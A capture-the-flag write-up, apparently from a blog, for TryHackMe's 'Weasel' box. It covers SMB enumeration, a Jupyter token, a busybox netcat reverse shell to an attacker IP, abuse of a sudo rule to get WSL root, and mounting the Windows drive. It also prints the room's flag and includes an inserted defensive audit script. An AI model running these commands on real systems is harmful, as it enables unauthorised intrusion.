➜ ~

Playing Hacks and Stuffs!


Project maintained by h4ckyou Hosted on GitHub Pages — Theme by mattgraham

Weasel TryHackMe


From the Nmap scan we can tell that this is a Windows box.

Let’s enumerate SMB first.

First we check which shares are available.

Now we can mount the datasci-team share.

Command: sudo mount -t cifs -o username=guest,password= //10.10.195.131/datasci-team mount

After looking through the folders in that share, I didn’t see anything interesting except a Jupyter token.

We can now unmount it.

Command: sudo umount mount

Now back to port 8888.

This is an instance of Jupyter, and it’s running on port 8888.

It requires a token to log in.

Remember we got a token from the SMB share, so using it here works.

Token: 067470c5ddsadc54153ghfjd817d15b5d5f5341e56b0dsad78a

Getting a shell on Jupyter is very easy, since it usually has an interactive Python instance and also a terminal.

But let’s go with the terminal option.

Click the New button, then click the Terminal button.

I just got a reverse shell using the busybox binary.

Command: busybox nc 10.2.42.156 1337 -e /bin/bash

From here we see that this is a Linux host.

But our Nmap scan showed that this is a Windows box.

So the only thing we can think of is that this is a host running WSL.

Looking at the current working directory, we can see an SSH key for the user dev-datasci-lowpriv.

We can try logging in over SSH with it, and it works.

Command:-
chmod 600 id_rsa
ssh -i id_rsa dev-datasci-lowpriv@10.10.195.131

Let’s see if we can root the WSL host, because if that works we can just mount the Windows host and access the administrator directory.

Also I’m taking this path because I suck at privesc on Windows 😄

Next we check our sudo permissions on the WSL host.

Interesting: we can run /home/dev-datasci/.local/bin/jupyter as root. That looks too easy already 🙂

But trying it doesn’t work.

We get "command not found", and that is because the binary isn’t in that specific path, smh.

I used the find command to locate the binary.

Command: find / -type f -name jupyter 2>/dev/null

Now we can just copy the binary to that path, since we have write access: /home/dev-datasci/.local is owned by us.

Command: cp /home/dev-datasci/anaconda3/bin/jupyter /home/dev-datasci/.local/bin/jupyter

Running sudo on it now works, cool.

Command: sudo /home/dev-datasci/.local/bin/jupyter --help
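Seen from the defender's side, the sudo rule above is exploitable because its target is missing and sits under a directory the low-privileged user owns. The following Python check is an added example, not part of the original writeup; the function name and the trusted_uids and stop_at parameters are assumptions made for illustration.

```python
import os
import stat
import sys


def audit_sudo_target(cmd_path, trusted_uids=(0,), stop_at="/"):
    """Return findings for one command path granted in sudoers.

    A rule is unsafe if the target is missing, or if the target or any
    directory above it can be modified by an account outside trusted_uids,
    because that account can then choose what root executes.
    stop_at (an assumption, mainly for testing) limits how far up we walk.
    """
    findings = []
    path = os.path.realpath(cmd_path)
    if not os.path.exists(path):
        findings.append(f"{path}: target does not exist")
        # Climb to the nearest ancestor that exists and audit from there.
        while not os.path.exists(path):
            path = os.path.dirname(path)
    while True:
        st = os.stat(path)
        if st.st_uid not in trusted_uids:
            findings.append(f"{path}: owned by uid {st.st_uid}")
        elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            # Conservative: any group/other write bit is reported.
            mode = stat.filemode(st.st_mode)
            findings.append(f"{path}: group/other writable ({mode})")
        parent = os.path.dirname(path)
        if path == stop_at or parent == path:
            break
        path = parent
    return findings


if __name__ == "__main__":
    # Default is the path from this writeup's sudo rule; pass others as arguments.
    targets = sys.argv[1:] or ["/home/dev-datasci/.local/bin/jupyter"]
    for target in targets:
        for finding in audit_sudo_target(target):
            print(finding)
```

An empty result means every component of the path is owned by a trusted uid and not group- or world-writable; any finding is a reason to move the sudo target to a root-owned location.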

From here we can start a new Jupyter lab instance and access it to get a new terminal running as root.

Here are the docs that helped me out.

But I got an error.

We can add the --allow-root flag to get past that message.

Doing that now works.

Command: sudo /home/dev-datasci/.local/bin/jupyter notebook --ip 10.10.195.131 --port 8089 --allow-root

It created this new link with the token as its GET parameter: http://10.10.195.131:8089/?token=20c98ba247520987b457638652bc252a9f55c74fe42375ba

I logged out of that Jupyter instance and logged in with the new token.

The same method we used earlier to get a shell works here too.

But remember, we are only root on this WSL instance. Still, this gives us permission to access the C: drive on the Windows host.

We can now just mount it

Here’s the resource that helped me out

Mounting it works and we can grab the root flag.

Command:-
mkdir /mnt/windows
mount -t drvfs C: /mnt/windows

The flag says something about elevated privesc: THM{evelated_w3as3l_l0ngest_boi}. Maybe the intended path was getting root on the main host via elevated privilege escalation, idk 🤔

And we’re done 👻